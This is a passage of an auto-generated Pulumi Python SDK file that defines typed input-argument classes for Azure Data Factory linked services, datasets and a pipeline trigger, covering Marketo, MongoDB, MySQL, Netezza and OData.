@pulumi.input_type
class MarketoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Marketo server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MarketoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MongoDbCollectionDatasetArgs:
def __init__(__self__, *,
collection_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The MongoDB database dataset.
:param Any collection_name: The table name of the MongoDB database. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "collection_name", collection_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MongoDbCollection')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="collectionName")
def collection_name(self) -> Any:
"""
The table name of the MongoDB database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "collection_name")
@collection_name.setter
def collection_name(self, value: Any):
pulumi.set(self, "collection_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MongoDbLinkedServiceArgs:
def __init__(__self__, *,
database_name: Any,
server: Any,
type: pulumi.Input[str],
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
auth_source: Optional[Any] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for MongoDb data source.
:param Any database_name: The name of the MongoDB database that you want to access. Type: string (or Expression with resultType string).
:param Any server: The IP address or server name of the MongoDB server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false. Type: boolean (or Expression with resultType boolean).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any auth_source: Database to verify the username and password. Type: string (or Expression with resultType string).
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the MongoDB database.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any port: The TCP port number that the MongoDB server uses to listen for client connections. The default value is 27017. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'MongoDb')
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if auth_source is not None:
pulumi.set(__self__, "auth_source", auth_source)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Any:
"""
The name of the MongoDB database that you want to access. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Any):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
The IP address or server name of the MongoDB server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authSource")
def auth_source(self) -> Optional[Any]:
"""
Database to verify the username and password. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "auth_source")
@auth_source.setter
def auth_source(self, value: Optional[Any]):
pulumi.set(self, "auth_source", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the MongoDB database.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the MongoDB server uses to listen for client connections. The default value is 27017. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class MultiplePipelineTriggerArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
pipelines: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]] = None):
"""
Base class for all triggers that support one to many model for trigger to pipeline.
:param pulumi.Input[str] type: Trigger type.
:param pulumi.Input[str] description: Trigger description.
:param pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]] pipelines: Pipelines that need to be started.
"""
pulumi.set(__self__, "type", 'MultiplePipelineTrigger')
if description is not None:
pulumi.set(__self__, "description", description)
if pipelines is not None:
pulumi.set(__self__, "pipelines", pipelines)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Trigger type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Trigger description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def pipelines(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]]:
"""
Pipelines that need to be started.
"""
return pulumi.get(self, "pipelines")
@pipelines.setter
def pipelines(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]]):
pulumi.set(self, "pipelines", value)
@pulumi.input_type
class MySqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for MySQL data source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] connection_string: The connection string.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'MySql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The connection string.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class NetezzaLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Netezza linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Netezza')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class NetezzaTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Netezza dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'NetezzaTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ODataLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Open Data Protocol (OData) linked service.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The URL of the OData service endpoint. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the OData service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password of the OData service.
:param Any user_name: User name of the OData service. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'OData')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the OData service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of authentication used to connect to the OData service.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password of the OData service.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name of the OData service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
